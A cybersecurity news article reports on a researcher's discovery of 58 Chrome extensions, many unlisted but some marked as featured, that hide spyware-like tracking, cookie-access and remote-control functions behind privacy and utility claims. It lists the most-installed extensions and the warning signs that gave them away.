Dozens of Chrome extensions, many of them featured on the Chrome Web Store but also hidden and not indexed by search engines, contain secret functionality to track users, a security researcher has discovered.
Secure Annex researcher John Tuckner uncovered a network of 58 Chrome extensions with six million total installs. They all gain overly broad permissions and contain hidden, potentially malicious functionality to access cookies and tokens, monitor user behavior, run remote code, and retrieve other sensitive data.
“There is significant command and control potential, like the ability to list top sites visited, open/close tabs, and get top sites visited,” the researcher said in a report.
These extensions masquerade as privacy or utility tools, from coupon‑finders to ad‑blockers, and some claim to protect users from other malicious extensions.
The Cybernews research team recently warned about the overly broad and invasive permissions many popular Chrome extensions usually gain upon installation. According to the analysis, 86 out of 100 extensions ask for highly dangerous permissions.
Tuckner’s list further demonstrates how dangerous extensions can be.
Most of the discovered extensions were unlisted, which means they are not visible to Chrome Web Store users or search engines. They can only be accessed via a direct link (URL), which can be delivered through malvertising campaigns, pop-ups, phishing schemes, fake update prompts, etc.
“Why are some of these extensions selected to be ‘Featured’ by Google when they are not discoverable by normal users? This blows my mind. Any normal user might interpret that status as the extension being verified and reputable. It should absolutely not be possible to be 'Featured' and not discoverable at the same time,” the researcher believes.
Tuckner initially identified 35 unlisted allegedly malicious extensions via a misspelled “unknow[.]com” domain. With Obsidian Security's help, the researcher updated the list to include additional extensions matching the behaviours. Google is aware of the research, according to Bleeping Computer.
The suspicious extensions have been reported to the tech giant, and the researcher continues to monitor their status.
“Luckily, some of these extensions have now been removed from the Chrome Web Store, but not all! Why is there such a discrepancy!” the researcher posted.
Luckily, some of these extensions have now been removed from the Chrome Web Store, but not all! Why is there such a discrepancy!
undefined tuckner (@tuckner) April 16, 2025
Tracking here:https://t.co/iqgifTcC1g pic.twitter.com/eAr3NgNFco
Tuckner publicly shares a list of extensions found to contain suspicious functionalities. The most popular among them are the following extensions:
- Cuponomia - Coupon and Cashback: over 700,000 installs
- Fire Shield Extension Protection: over 300,000 installs
- Total Safety for Chrome: over 300,000 installs
- Browser Checkup for Chrome by Doctor: over 200,000 installs
- Protecto for Chrome: over 200,000 installs
- Browser WatchDog for Chrome: over 200,000 installs
- Securify for Chrome: over 200,000 installs
- Choose Your Chrome Tools: over 200,000 installs
- Securify Viewpoint Search: over 200,000 installs
The domains associated with the extensions use similar keywords. The report provides a full list of compromise indicators.
What indicates the extensions may be malicious?
All Chrome extensions have a manifest file that lists all the required permissions. Overly broad and intrusive permissions are the first clue, especially for extensions that only feature simple or trivial functions.
The second sign for Tuckner was misspelled domains (website addresses) that the extensions communicate with.
“Having worked in security for a while, a misspelling in a domain can really jump out at you, and unknow[.]com just looks too good.”
The researcher also discovered that the codebase for the actual claimed purpose was very minimal or missing entirely. Instead, Tuckner discovered heavily obfuscated code, raising many red flags.
“The ability for the extension’s configuration to be remotely controlled, and the capabilities in the browser extension’s code, is enough for me to come to the same conclusion that all of these extensions are a family of spyware or infostealers,” the researcher explained.
A deep dive into the code unveiled many capabilities, including cookie retrieval, tracking, configuring a new search provider, sending queries with referral parameters to capture revenue, etc.
All the discovered extensions used the same code patterns, had identical callback domain structures, used the network of mispelled domains, and had the same lists of permissions.
Cybernews researchers warned that Chrome extension permissions are critical – they define what the add-on can access and control within the browser and system. We recommend regularly reviewing and removing unused extensions and following other recommendations.
Your email address will not be published. Required fields are markedmarked